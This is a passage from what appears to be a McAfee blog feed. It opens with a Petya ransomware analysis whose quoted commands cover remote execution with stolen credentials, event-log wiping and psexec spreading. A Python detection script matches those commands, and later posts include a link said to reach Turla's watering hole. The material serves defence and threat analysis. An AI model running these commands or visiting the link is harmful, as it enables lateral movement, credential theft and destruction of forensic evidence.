Because the WannaCry outbreak caused many people to apply all the latest Windows patches, Petya introduces a few more spreading mechanisms to be more successful. The next method Petya attempts is to copy itself and a copy of psexec.exe to the remote machine’s ADMIN$ folder. If it is successful, the malware attempts to start psexec.exe using a remote call to run it as a service, as we can see below:

The preceding image first shows the DLL being copied to the remote host. And the following image shows psexec being copied and then attempting to start it using the svcctl remote procedure call.

Both files are copied to the C:\Windows folder.

One last method attempted by the malware is to use the Windows Management Instrumentation Command-line (WMIC) to execute the sample directly on the remote machine, using stolen credentials. The command used by the malware looks like this:

  • exe %s /node:”%ws” /user:”%ws” /password:”%ws” process call create “C:\Windows\System32\rundll32.exe \”C:\Windows\%s\” #1

where “%ws” is a variable representing a wide string, which will be generated based on the current machine and credential being exploited.

Once the malware runs on the machine, it will drop psexec.exe to the local system as c:\windows\dllhost.dat, and another .EXE (either 32- or 64-bit version depending on the operating system) to the %TEMP% folder. This binary is a modified version of a password dump tool, similar to Mimikatz or LSADump.

The preceding code shows the LSA functions used during password extraction.

This .EXE accepts as a parameter a named pipe similar to the following:

  • \\.\pipe\{df458642-df8b-4131-b02d-32064a2f4c19}

This pipe is used by the malware to receive the stolen passwords, which are then used by the WMIC shown above.

All these files are present in the resource section of the main DLL in a compressed form, as follows:

The malware then encrypts local files and the MBR, and installs a scheduled task to reboot the machine after one hour using schtasks.exe, as seen below:

The malware encrypts files with AES-128 and protects the file encryption key with RSA. This differs from previous variants, which used Salsa20. The RSA public key used to encrypt the file encryption keys is hardcoded and can be seen below:

The malware also attempts to clear Event logs to hide its traces, by executing the following commands:

  • wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:

After the machine is rebooted, the ransom message appears and demands US$300 in Bitcoin:

At the time of writing there are few transactions to this account, but this could change quickly once more victims notice they are infected:

We will update this blog as more information arrives. Systems protected with McAfee ENS 10.5 and McAfee Total Protection should be protected from known samples if their products are up to date and connected to McAfee Global Threat Intelligence. McAfee Adaptive Threat Protection, which integrates machine learning and containment capabilities, detects both the main DLL and the dropped EXE, as seen below:

Detection of the main DLL is shown above, and detection of the sample dropped in %TEMP% is shown below:

Update (June 27)

After further analysis of the current samples, we have learned more about this threat:

  • This map shows the current distribution of clients that have detected known samples, with darker colors representing a greater number of detections:

  • The following diagram shows the flow of events after the initial infection: 
  • Reports on social media claim there is a kill switch in the malware that can be activated by creating a specific file under C:\Windows. Although we do see code that checks for the existence of a file, we cannot confirm that the filename is fixed. In our replication, the filename checked on the target machine must match the filename used on the source machine, so it is not possible to predict the filename before an infection occurs, and we cannot confirm that this is a viable kill switch.
  • The ransomware component affects far fewer file extensions than is common. The list of extensions that will be encrypted by the malware:

  • The four resources present in the resource section follow. They are simply compressed with zlib and extracted during malware initialization:
    • psexec.exe, digitally signed by Microsoft.
    • 32-bit .exe with the password-stealing component.
    • 64-bit .exe with the password-stealing component.
    • Shellcode with a modified version of the Eternal Blue exploit.
  • Once a machine is infected, the sample attempts to spread to other machines on the network. Unlike WannaCry, which attempted to infect all IP addresses on the network, Petya’s approach is more precise and generates much less traffic over the network. Upon execution, the sample will check if the current machine is a workstation or a domain controller.

If the machine is identified as a domain controller, the malware will query its DHCP Service to retrieve a list of machines that were served with IP addresses within all subnets defined on the DHCP server.

Every client IP address retrieved with this technique is attacked with the EternalBlue exploit to spread the malware to other machines on the network.

  • The malware has not yet been found to use any document or social engineering technique as a propagation mechanism.
  • The main DLL component accepts a parameter for its export. This parameter is the time it will wait before rebooting the machine. By default, when the malware infects a remote system, it runs the remote DLL with the value “40,” which makes it wait 40 minutes before rebooting the machine, as shown below:
    • Rundll32 c:\windows\<dll name>.dll,#1 40
  • The malware generates a single AES-128 key to encrypt the files. This variant uses one key for all files, which differs from some other malware families. The key is generated once during the initialization of the malware.
  • As we saw with WannaCry network traffic, this malware also sends, at some point, a hardcoded IP address as part of the ConnectX request in the NETBIOS session. The IP address in the NETBIOS packet is highlighted below and can be used to detect malicious traffic on the network:

[End update]

Indicators of compromise

Known hashes

  • 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745 (main 32-bit DLL)
  • 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1 (main 32-bit DLL)
  • f8dbabdfa03068130c277ce49c60e35c029ff29d9e3c74c362521f3fb02670d5 (signed PSEXEC.EXE)
  • 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f (64-bit EXE)
  • eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998 (32-bit EXE)

Files

  • c:\windows\dllhost.dat
  • c:\windows\<malware_dll> (no extension)
  • %TEMP%\<random name>.tmp (EXE drop)

Other indicators

  • PIPE name: \\.\pipe\{df458642-df8b-4131-b02d-32064a2f4c19}
  • Scheduled task running “shutdown -r -n”

Detection

  • McAfee products detect this threat as Ransom-Petya with coverage from DAT Version 8574 (ENS DAT Version 3175).
  • McAfee detects this threat with Global Threat Intelligence File Reputation (with a Low setting).
  • McAfee Network Security Platform detects Petya ransomware:
    • 0x43c0bd00- NETBIOS-SS: MS17-010 SMB Remote Code Execution (Eternal Tools and WannaCry Ransomware)
    • 0x451e3300- HTTP: Microsoft Office OLE Arbitrary Code Execution Vulnerability (CVE-2017-0199)
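A small detector that turns the commands, pipe name, dropped files and hashes documented above into matching rules over process-creation events, as an added example that is not McAfee code. The event shape (id, image, command_line, sha256), the placeholder host 192.0.2.10, the task name and the DLL file name sample_payload are assumptions, and the sample events are constructed.

```python
"""Detection logic for the Petya host-level indicators listed above.
Added example for this page, not McAfee code.  Events are constructed
samples in a Sysmon/4688-like shape (id, image, command_line, sha256);
the field names and the file name 'sample_payload' are assumptions."""
import re
from typing import Dict, List

# SHA-256 hashes from the "Known hashes" list above.
KNOWN_HASHES = {
    "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745",  # main 32-bit DLL
    "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1",  # main 32-bit DLL
    "f8dbabdfa03068130c277ce49c60e35c029ff29d9e3c74c362521f3fb02670d5",  # signed PSEXEC.EXE
    "02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f",  # 64-bit EXE
    "eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998",  # 32-bit EXE
}
# Pipe used to hand stolen credentials back to the main DLL.
PIPE_NAME = r"\\.\pipe\{df458642-df8b-4131-b02d-32064a2f4c19}"
# psexec.exe is dropped under this name.
DROPPED_PSEXEC = r"c:\windows\dllhost.dat"
# The password-dumping EXE runs from %TEMP%\<random name>.tmp.
TEMP_TMP_EXE = re.compile(r"\\temp\\[^\\]+\.tmp$", re.I)

# Command-line rules: (indicator name, regex).  Each mirrors a command
# quoted in the analysis above.
CMDLINE_RULES = [
    # wevtutil cl <log> ... & fsutil usn deletejournal (event-log wiping)
    ("petya_log_clearing",
     re.compile(r"wevtutil\s+cl\s+\w+.*fsutil\s+usn\s+deletejournal", re.I)),
    # wmic /node:<host> /user: /password: process call create "...rundll32.exe <dll> #1"
    ("petya_wmic_lateral_movement",
     re.compile(r"wmic(\.exe)?\s.*/node:.*process\s+call\s+create\s+.*rundll32\.exe.*#1", re.I)),
    # rundll32 c:\windows\<dll>,#1 <minutes> (main DLL started through export #1)
    ("petya_rundll32_export1",
     re.compile(r'rundll32(\.exe)?\s+"?c:\\windows\\[^\s"\\,]+"?[\s,]+#1\b', re.I)),
    # schtasks creating the delayed "shutdown -r -n" reboot task
    ("petya_reboot_task",
     re.compile(r"schtasks(\.exe)?\s.*shutdown(\.exe)?\s+[-/]r\b", re.I)),
]


def check_event(event: Dict[str, str]) -> List[str]:
    """Return the names of all Petya indicators matched by one process event."""
    cmd = event.get("command_line", "")
    image = event.get("image", "")
    hits = [name for name, rx in CMDLINE_RULES if rx.search(cmd)]
    if PIPE_NAME.lower() in cmd.lower():
        hits.append("petya_credential_pipe")
    if image.lower().endswith(DROPPED_PSEXEC):
        hits.append("petya_dropped_psexec_dllhost_dat")
    if TEMP_TMP_EXE.search(image):
        hits.append("petya_tmp_exe_in_temp")
    if event.get("sha256", "").lower() in KNOWN_HASHES:
        hits.append("petya_known_hash")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map event id -> matched indicators, omitting events with no hits."""
    return {e["id"]: hits for e in events if (hits := check_event(e))}


# Constructed sample events (192.0.2.10, reboot_task and sample_payload are placeholders).
SAMPLE_EVENTS = [
    {"id": "e1", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c wevtutil cl Setup & wevtutil cl System & "
                     "wevtutil cl Security & wevtutil cl Application & "
                     "fsutil usn deletejournal /D C:"},
    {"id": "e2", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r'wmic.exe /node:"192.0.2.10" /user:"CORP\admin" '
                     r'/password:"[redacted]" process call create '
                     r'"C:\Windows\System32\rundll32.exe \"C:\Windows\sample_payload\" #1"'},
    {"id": "e3", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32 c:\windows\sample_payload,#1 40"},
    {"id": "e4", "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks.exe /Create /TN reboot_task /TR "shutdown -r -n" /SC once /ST 10:00'},
    {"id": "e5", "image": r"C:\Users\alice\AppData\Local\Temp\a1b2c3.tmp",
     "command_line": r"a1b2c3.tmp \\.\pipe\{df458642-df8b-4131-b02d-32064a2f4c19}",
     "sha256": "eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998"},
    {"id": "e6", "image": r"c:\windows\dllhost.dat",
     "command_line": r"dllhost.dat \\192.0.2.10 -accepteula -s -d "
                     r"C:\Windows\System32\rundll32.exe C:\Windows\sample_payload,#1 40",
     "sha256": "f8dbabdfa03068130c277ce49c60e35c029ff29d9e3c74c362521f3fb02670d5"},
    {"id": "e7", "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},  # benign control event
]

if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(event_id, "->", ", ".join(hits))
```

The rundll32 rule deliberately tolerates a missing .dll extension, since the dropped DLL is listed above as having none.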

For the latest information on McAfee product protection against this attack, read this Knowledge Center article. For more on how McAfee products can help defend against this attack, see “How to Protect Against Petya Ransomware in a McAfee Environment.”

Can you see me now? Unpacking malware for advanced threat analysis.
https://securingtomorrow.mcafee.com/business/security-operations/can-see-now-unpacking-malware-advanced-threat-analysis/
Thu, 22 Jun 2017 16:00:24 +0000

The post Can you see me now? Unpacking malware for advanced threat analysis. appeared first on McAfee Blogs.
This blog was written by Stan Golubchik.

A recent McAfee blog ‘Malware Packers Use Tricks to Avoid Analysis, Detection’, highlighted the use of packers as an effective way to slow down analysis and decrease detection by antimalware products.

As an engineer with a keen interest in malware, I’m very familiar with packers and the conclusion from that blog that ‘manual analysis usually defeats .’ Manual analysis can take time. Something that seems to be in short supply as of late. I’ve found a McAfee product - McAfee Advanced Threat Defense (ATD) - that takes care of the packing problem for me, saving lots of time and a few headaches too.

Let me explain: First, what’s a packer?

A packer is a tool that compresses, encrypts, or otherwise modifies the format of a file. By packing a file, malware authors obfuscate its content and disrupt analysis by threat detection tools. The technique is also referred to as “executable compression.” Compressing the file reduces its footprint and can reduce the chance of the malicious file being detected, allowing the payload to be delivered. Effective as packing is, forcing the packed code to execute and then analyzing a memory dump of the unpacked result provides a way to detect even the most advanced threats. So how is this accomplished? McAfee ATD provides an answer to detecting the most advanced and obfuscated code in packed or unpacked files.

When a packed sample arrives at McAfee ATD for analysis, the sample is loaded into memory and the packer associated with the sample unpacks the code, de-obfuscating the code during execution. At this point, several advanced detection engines are engaged, including dynamic analysis (observation of execution) and static code analysis (where the code – not just the behavior it exhibited in the sandbox – is scrutinized for any malicious behavior). After the sample has finished execution, McAfee ATD assesses the memory dump and maps the code. As sections of code are analyzed, family classification is performed on the buffered code based on known malicious behavior. Once the assessment of behavioral characteristics of the code is completed, a determination on whether the file is clean or malicious yields a reputation verdict. Quick. Easy. Done.

As mentioned in the previous blog, a rather effective method for defeating a packer is to manually analyze the file. McAfee ATD can help with that as well. McAfee ATD offers manual analysis capabilities with its interactive mode, or X-Mode. Manually uploading a file to a McAfee ATD appliance and enabling the X-Mode feature lets users choose the analysis environment or virtual machine (VM) in which to execute the file. When a file is uploaded this way, a user may open a window to the active VM detonating the file, to observe and interact with the malware. This gives a malware analyst a deep investigative and forensic capability for understanding the behavior of the executed code.

A packer can be an effective way to slow analysis down or even avoid it altogether. For packed files that would typically fly under the radar of traditional sandbox solutions, McAfee ATD provides ways to overcome this advanced method of evading detection.

Migration to McAfee Endpoint Security “Like Moving from a VW Bug to an Aston Martin”
https://securingtomorrow.mcafee.com/business/migration-mcafee-endpoint-security-like-moving-vw-bug-aston-martin/
Thu, 22 Jun 2017 14:00:01 +0000

The post Migration to McAfee Endpoint Security “Like Moving from a VW Bug to an Aston Martin” appeared first on McAfee Blogs.
Norbert Marx, a senior security engineer at Accarda, a Swiss provider of customer loyalty cards and other payment-related services, has become an evangelist of sorts for McAfee Endpoint Security (ENS) ever since his company migrated to it.

“What are you waiting for?” says Marx. “McAfee ENS protects better, is easier to use, and saves time. It is better in every way than its predecessor. It’s like two different worlds. It’s like moving from a Volkswagen bug to an Aston Martin.”

Marx is the person chiefly responsible for technical security decisions and troubleshooting. What he likes best about McAfee ENS is how it simplifies his job and others’. Since the company runs a lean business—it serves more than two million end customers but has just 220 employees—and has a very small security staff, ease of administration is critical.

“With our limited information security staff, a security tool must be easy to use or we won’t even consider it,” claims Marx. “It also has to do what it is supposed to do. We simply don’t have time to deal with extremely complicated systems or firefighting.”

With McAfee ENS, Accarda saves time when pushing out updates or troubleshooting. Previously, the anti-virus engine, host intrusion prevention, and web control were separate agents on each endpoint. By migrating to ENS, the company consolidated all of those aspects of endpoint protection into a single agent.

The improved graphical user interface of McAfee ENS also facilitates endpoint security management. According to Marx, the ENS interface within McAfee ePO is notably easier to use, with very helpful and understandable graphical displays and alerts. In addition, it provides more insights into the origins, attempted actions, and targets of attacks to help with decision making and hardening of policies and defensive actions.

“What are you waiting for? McAfee ENS protects better, is easier to use, and saves time. It is better in every way than its predecessor. It’s like two different worlds. It’s like moving from a Volkswagen bug to an Aston Martin.”

-Norbert Marx, Senior Security Engineer, Accarda

Furthermore, superior endpoint protection with McAfee ENS equates to fewer security incidents and therefore less time spent remediating. “With the added reputation and behavior-based capabilities of ENS, we can identify malware and zero-day threats more quickly and effectively,” says Marx, “and with DAC [Dynamic Application Containment], we can contain them before they can cause harm.”

Accarda’s overall security posture is also bolstered by the integration of McAfee ENS with the McAfee Data Exchange Layer (DXL) and McAfee Threat Intelligence Exchange, which combines multiple internal and external threat information sources and instantly shares this data with all the company’s DXL-connected security solutions, including McAfee Web Gateway and the McAfee SIEM.

“For instance, if an application is violating our security policy or causes suspicious activity that is detected by McAfee ENS, we can immediately tag the file as potentially malicious, thus preventing its execution anywhere in the enterprise,” explains Marx. “And with the relevant data now contained in the Threat Intelligence Exchange database, if anyone else attempts to go to that website, Web Gateway won’t allow it.”

In addition, Accarda continues to benefit from the ease of use of McAfee ePolicy Orchestrator® (ePO™), the central management console that enables management of multiple McAfee solutions from one screen. (McAfee ePO was one of the main reasons that Accarda chose its legacy endpoint solution, the McAfee Endpoint Threat Protection suite.) At Accarda, each of the four or five people who use McAfee ePO regularly has his own dashboard for instant viewing of the information most important to him. For instance, one dashboard is used strictly by IT operations, another by the person who oversees PCs, another by a server administrator, and another by Marx for an overall view of security and troubleshooting. “Without McAfee ePO, my job would be many times more difficult,” claims Marx.

Using the McAfee migration tool inside McAfee ePO, Accarda migrated all the company’s endpoints in just one day from the McAfee VirusScan Enterprise anti-virus engine and McAfee SiteAdvisor agents in its McAfee Enterprise Threat Protection suite to McAfee ENS. An early adopter, Accarda began with ENS version 10.1 and as new versions of ENS have been released, Accarda has upgraded to them. Marx notes that each version has offered improvements over previous versions and that ENS version 10.5 is the best yet.

So what are you waiting for?

 

To read the full case study on the Accarda, click here. Get your questions answered by tweeting @McAfee_Business.

‘McAfee Labs Threats Report’ Explores Malware Evasion Techniques, Digital Steganography, Password-Stealer Fareit
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-explores-malware-evasion-techniques-digital-steganography-password-stealer-fareit/
Tue, 20 Jun 2017 04:01:23 +0000

The post ‘McAfee Labs Threats Report’ Explores Malware Evasion Techniques, Digital Steganography, Password-Stealer Fareit appeared first on McAfee Blogs.
This blog post was written by Vincent Weafer.

We got a little carried away in the McAfee Labs Threats Report: June 2017, published today. This quarter’s report has expanded to a rather hefty 83 pages! It contains three highly educational topics, in addition to the usual set of threats statistics:

  • We broadly examine evasion techniques and how malware authors use them to accomplish their goals. We discuss the more than 30-year history of evasion by malware, the underground market for off-the-shelf evasion technology, how several contemporary malware families leverage evasion techniques, and what to expect in the future, including machine-learning and hardware-based evasion.
  • We explore the very interesting topic of steganography in the digital world. Digital steganography hides information in benign-looking objects such as images, audio tracks, video clips, or text files. Of course, attackers use these techniques to move information past security systems. We explain how that happens in this key topic.
  • We deconstruct Fareit, the most famous password-stealing malware. We cover its origins, typical infection vectors, architecture and inner workings, how it has changed over the years, and how it was likely used in the breach of the Democratic National Committee before the 2016 U.S. Presidential election. Coincidentally, DocuSign reported that on May 15, customer email addresses were stolen and then used in a phishing campaign. Victims who clicked on the phishing links were infected with malware, one of which was Fareit. Read our technical analysis of the DocuSign attack.

Accompanying each of these key topics is a Solution Brief that goes into detail about how McAfee products can protect against these threats.

Here are some highlights from our extensive analysis of threats activity in Q1:

  • Malware: New malware samples rebounded in Q1 to 32 million. The total number of malware samples increased 22% in the past four quarters to 670 million samples.
  • Ransomware: New ransomware samples rebounded in Q1 primarily due to Congur ransomware attacks on Android OS devices. The number of total ransomware samples grew 59% in the past four quarters to 9.6 million samples. (We will discuss the WannaCry ransomware in our next quarterly report.)
  • Mobile malware: Reports from Asia doubled in Q1, contributing to a 57% increase in global infection rates. Total mobile malware grew 79% in the past four quarters to 16.7 million samples.
  • Incidents: We counted 301 publicly disclosed security incidents in Q1, an increase of 53% over Q4. The health, public, and education sectors comprised more than 50% of the total. 78% of all publicly disclosed security incidents in Q1 took place in the Americas.

Read the McAfee Labs Threats Report: June 2017.

How a Hacking Group Used Britney Spears’ Instagram to Operate a Command and Control Server
https://securingtomorrow.mcafee.com/business/hacking-group-used-britney-spears-instagram-operate-command-control-server/
Mon, 19 Jun 2017 16:01:28 +0000

The post How a Hacking Group Used Britney Spears’ Instagram to Operate a Command and Control Server appeared first on McAfee Blogs.
A nasty piece of malware is currently being tested by a Russian hacking group named Turla, and its trial round has been conducted in an unexpected area of the internet — the comments section of Britney Spears’ Instagram. As a matter of fact, they’re using her Instagram as a way to contact the malware’s command and control (C&C) server.

So how does Turla make this happen, exactly? Leveraging a recently discovered backdoor found in a fake Firefox extension, the cybercriminals instruct the malware to scroll through the comments on Spears’ photos and search for one that has a specific hash value. When the malware finds the comment it was told to look for, it converts it into this Bitly link: http://bit.ly/2kdhuHX. The shortened link resolves to a site that’s known to be a Turla watering hole.

This way, if their attack infrastructure is discovered, the cybercriminals can change the C&C address without changing the malware. If the attackers want to create a new meeting point, all they have to do is delete the first planted comment and post a new one with the same hash value.

This infected comment on Spears’ post doesn’t look exactly normal, but most people probably would think it’s just spam — unless they clicked it. If someone does in fact click on the link, they’ll be directed to the hacker group’s forum, which is where they actually infect innocent users. For this Trojan in particular, visitors who click will get taken to a site and asked to install the extension with the benign name “HTML5 Encoder.”

The good news is — this is, after all, just a test. Plus, Firefox is said to be already working on a fix so that the extension being used won’t work anymore.

For more information on this attack and others like it, follow @McAfee and @McAfee_Business.

McAfee Public Cloud Server Security Suite Paid AMI Now on AWS Marketplace
https://securingtomorrow.mcafee.com/business/mcafee-public-cloud-server-security-suite-paid-ami-now-aws-marketplace/
Thu, 15 Jun 2017 16:00:06 +0000

The post McAfee Public Cloud Server Security Suite Paid AMI Now on AWS Marketplace appeared first on McAfee Blogs.
This blog post was written by Teresa Wingfield.

A new Paid Amazon Machine Image (AMI) for McAfee Public Cloud Server Security Suite (McAfee PCS) is now available on an hourly basis on the Amazon Web Services (AWS) Marketplace. The Paid AMI is a flexible option for protecting AWS workloads since there’s no need to estimate usage and obtain a license before getting started.  You may want to explore McAfee PCS (Paid AMI) for AWS security if you:

  • Prefer an OpEx “pay-as-you-go” pricing model
  • Have spiky (variable) sizing and timing requirements for your workloads that are difficult to estimate
  • Want to test drive McAfee PCS before purchasing a license from McAfee.

With AWS, you are participating in a shared responsibility security model where AWS is responsible for securing underlying infrastructure and you are responsible for securing your workloads and configuring platform security. McAfee PCS provides visibility and protection to keep AWS deployments safe. Comprehensive protection starts at just $0.1 per hour.

Our new McAfee PCS PAID AMI is designed to help enterprise and government AWS customers quickly secure their Amazon workloads with foundational security consisting of:

  • Cloud workload discovery and monitoring
  • Antimalware
  • Host-based firewall
  • Host intrusion prevention.

Whitelisting, file integrity monitoring, and change prevention are also available to help protect high-risk environments and meet regulatory compliance. McAfee PCS protection scales elastically with your Amazon workloads for continuous protection.

Cloud Workload Discovery provides end-to-end visibility into all cloud workloads

What do I get from using McAfee PCS to protect AWS workloads?

  • Faster threat detection (as shown in the screenshot above) through insights into weak security controls for cloud workloads, unsafe firewall settings, unencrypted volumes, and indicators of compromise such as suspicious traffic
  • Quick and easy remediation using McAfee ePolicy Orchestrator or your favorite DevOps tools such as Amazon OpsWorks, Chef, or Puppet
  • Defense against emerging and advanced threats with malware scanning and intrusion prevention
  • Protection from advanced persistent threats without requiring signature updates or labor-intensive list management
  • Prevention of change activity that can lead to security breaches, data loss, and outages
  • Easier achievement and demonstration of regulatory compliance

Get Started

Start at no cost with a free trial! Click here to visit the AWS Marketplace.
Why This California State Agency Compares McAfee ENS to a New Car
https://securingtomorrow.mcafee.com/business/california-state-agency-compares-mcafee-ens-new-car/
Thu, 08 Jun 2017 14:00:57 +0000

The post Why This California State Agency Compares McAfee ENS to a New Car appeared first on McAfee Blogs.
“If you think of endpoint protection as a car,” says Security Engineer Jeff Bowen at the California Department of Water Resources (DWR), “with McAfee ENS, we now have the latest model, with the best instrumentation, nicest features, and all the bells and whistles.”

His CISO agrees. “With McAfee ENS, we remediate faster, have less business disruption, make better decisions, and protect neighboring workstations and our overall environment—instead of focusing all our attention on an infected workstation while another one gets hit,” notes Chief Information Security Officer Richard Harmonson.

The largest of 30 departments within the California Natural Resources Agency (CNRA), the DWR provides technology infrastructure-as-a-service to the entire state agency. Harmonson and his security team purchase, deploy, and provide multi-tenancy security solutions across the CNRA’s 16,000 endpoints. In the past, the DWR provided another vendor’s endpoint solution to CNRA departments, but that product’s limited visibility, very high false positive rate, and dated technology— “the typical anti-virus product that we’ve seen for the past two decades”— drove Harmonson and his team to seek a better solution.

The DWR information security team found what it was looking for in McAfee ENS version 10.5, which it rolled out across all 4,000 end-user physical devices within DWR. DWR will deploy ENS across the remaining CNRA departments in the coming months, and eventually across virtualized servers as well.

So why are Harmonson and his staff as delighted with McAfee ENS as with a new car?

Three main reasons.

First, improved protection and detection. “Since we rolled out McAfee ENS, we have been detecting and blocking threats we didn’t see before,” claims Harmonson. That’s because its Real Protect machine learning behavioral analysis technology catches more malware, and its Dynamic Application Containment (DAC) functionality immediately quarantines unknown threats so they can be analyzed, protecting Patient Zero from damage.

Second, improved decision making that enables faster response and remediation. According to Harmonson, this is one of the greatest benefits thus far since deploying McAfee ENS. “McAfee ENS is providing us with more and better information to help us better understand the threats that enter our environment,” he says.  Instead of having to wait 24 hours for its anti-virus vendor to create a new signature, DWR is “getting to the point where we can investigate an incident and resolve it within one to four hours.”

Third, ability to take advantage of McAfee Data Exchange Layer (DXL) integration.  McAfee ENS is built to leverage DXL. With the DWR’s recent addition of a McAfee Advanced Threat Defense (ATD) sandboxing appliance and soon-to-be-deployed McAfee Threat Intelligence Exchange and McAfee Endpoint Threat Defense and Response, the organization will be able to share local and global threat information in near real-time among these systems. With these additional McAfee tools, Harmonson expects to create a more adaptive, sustainable threat defense lifecycle that reduces the administrative burden on staff even further, which is especially important since adding staff with the right skill set can be a challenge.

Because of his experience thus far, Harmonson encourages colleagues and counterparts in other California state agencies to consider McAfee ENS. “With the layers of protection that [McAfee ENS] provides, it far exceeds the stereotypical anti-virus product,” he says. “I really appreciate how it provides my staff with the relevant information at their fingertips, helps them understand what happened, accelerates response time, and mitigates risk.”

To read the full case study on the California Department of Water Resources, click here. Get your questions answered by tweeting @McAfee_Business.

New Report Quantifies Time’s Impact on Costs of Data Breaches and Disruption Attacks
https://securingtomorrow.mcafee.com/business/new-report-quantifies-times-impact-costs-data-breaches-disruption-attacks/
Fri, 02 Jun 2017 04:00:41 +0000

The post New Report Quantifies Time’s Impact on Costs of Data Breaches and Disruption Attacks appeared first on McAfee Blogs.

This blog was written by Barbara Kay.

New analysis from the Aberdeen Group, based on data provided by Verizon, provides fresh evidence quantifying the cost of time in two different incident types: data compromises and sustained disruption in service availability. These findings underscore the urgency for cybersecurity practitioners to minimize detection and containment time.

According to the McAfee-commissioned Aberdeen report, Cybersecurity: For Defenders, It’s About Time, the business impact from a data breach is greatest at the beginning of the exploit, when records are first compromised. That’s logical, since attackers want to get in and out with the goods (your data) in as little time as possible. Most responders are closing the barn door well after the horse has gone, when most of the damage has already been done.

However, in contrast, the business impact from a sustained disruption in availability continues to grow from the time of compromise to the time of remediation. As illustrated below, a 2X improvement in your time to detect and respond to an attack translates to a roughly 70 percent lower business impact.

Aberdeen Group concludes that time to detection remains a top challenge for defenders responding to cyberattacks, putting enterprises at risk. The report notes that across more than 1,300 data breaches investigated between 2014 and 2016, half of detections took up to 38 days (a median of 38 days), while the mean was 210 days, an average skewed by some incidents taking as long as four years.

This data shows that cybersecurity practitioners can improve their ability to protect business value if they can implement strategies that prioritize faster detection, investigation, and response to incidents.

Recommendations

In the study, Aberdeen Group provides four illustrative examples of how recapturing an advantage of time can help defenders to reduce their risk, with suggestions on countermeasures and counterstrategies. Some highlights include use of the latest identification and containment technologies:

  • Before zero-day: identification (e.g., through reputation, heuristics, and machine learning). Attackers have become increasingly adept at morphing the footprint of their malicious code to evade traditional signature-based defenses. But advanced pre-execution analysis of code features, combined with real-time analysis of code behaviors, is now being used to identify previously unknown malware without signatures, before it has the opportunity to execute.
  • After identification: containment (e.g., through dynamic application protection and aggregated intelligence on active threat campaigns). Advanced endpoint defense capabilities now allow potentially malicious code to load into memory but block it from making system changes, spreading to other systems, or performing other typically malicious behaviors. This approach provides immediate protection and buys additional time for intelligence gathering and analysis, without disrupting user productivity.

For data center and cloud security, some of the above endpoint tactics can be applied to server and virtual workloads to protect against both known and unknown exploits. Aberdeen Group also suggests you can improve your results through shielding and virtual patching tactics. This concept has been around for years, but is especially helpful when assets are centralized.

  • Virtual patching: sometimes known as external patching or vulnerability shielding, this establishes a policy external to the resources being protected in order to identify and intercept exploits of vulnerabilities before they reach their intended target. In this way, direct modifications to the protected resource are not required, and updates can be automated and ongoing.
  • Strategic enforcement points: design using fewer policy enforcement points (i.e., at selected points in the enterprise network, as opposed to taking the time to apply vendor patches on every system).

As an industry, we are spending more and working harder to shorten the time advantage of the attacker. Modern tools and thoughtful practices in endpoint and data center infrastructure complement the analytics and automation investments that are transforming the Security Operations Center (SOC), technologies such as anomaly detection and threat intelligence correlation.

This report shows that we still have work to do, and provides evidence for CIOs and the board that there’s a clear business incentive to continue to act.

To read the full report, visit https://mcafee.ly/2r0VNBq.

With McAfee ENS, Swedish Town Gains More Secure Environment Requiring Less Work
https://securingtomorrow.mcafee.com/business/mcafee-ens-swedish-town-gains-secure-environment-requiring-less-work/
Thu, 25 May 2017 14:00:06 +0000

The post With McAfee ENS, Swedish Town Gains More Secure Environment Requiring Less Work appeared first on McAfee Blogs.

For Jens Lindström, who oversees security operations for Norrköpings Kommun, a Swedish town of 140,000 inhabitants, ransomware was becoming his nemesis. “With the increasing pace of ransomware attacks, I was beginning to imagine a day in the not-too-far-off future when all my time would be dedicated to dealing with ransomware attacks,” he muses. “Thankfully, we implemented McAfee ENS before that could happen.”

The need to bolster endpoint protection and thwart ransomware ultimately drove this Swedish municipality to migrate the McAfee VirusScan Enterprise engine, McAfee Host Intrusion Prevention, and McAfee SiteAdvisor® functionality of its McAfee Complete Threat Protection suite to McAfee Endpoint Security (ENS) version 10.2 not long after it became available. Soon after the ENS 10.2 deployment, ENS version 10.5 became available, and the organization upgraded to it to take advantage of its Real Protect machine learning technology alongside Dynamic Application Containment.

According to Lindström, migration of the town’s 14,000 endpoints to McAfee ENS 10.2 took only a few hours each day for about a week. “With the help of our partner Advania and the McAfee migration tool, [migration to McAfee ENS] was extremely straightforward and not complicated at all,” says Lindström. “First, we rolled it out to all our schools, then we moved on to the administrative networks.”

Happily, Lindström’s hopes for improved endpoint protection with McAfee ENS were fulfilled. “Our single biggest driver for migrating to McAfee ENS and our biggest benefit thus far has been better protection,” notes Lindström. “Since implementing ENS, we have seen a dramatic reduction in infected systems and ransomware attacks.”

Improved protection means Lindström spends less time fighting fires, which enables him to do his job more efficiently and effectively. In addition, the improved graphical user interface in McAfee ENS helps him every day in the security administrator part of his job. “Dealing with endpoint security has become much easier and more streamlined since we migrated,” he says. “I can quickly see what tasks require action and more easily do many of those tasks, such as push updates across the enterprise.”

Of course, making security administration easier is not the municipality’s top priority; protecting services and information for the town’s citizens is. However, with McAfee ENS, Norrköpings Kommun has a more secure environment while requiring less time and effort from its very limited information security staff.

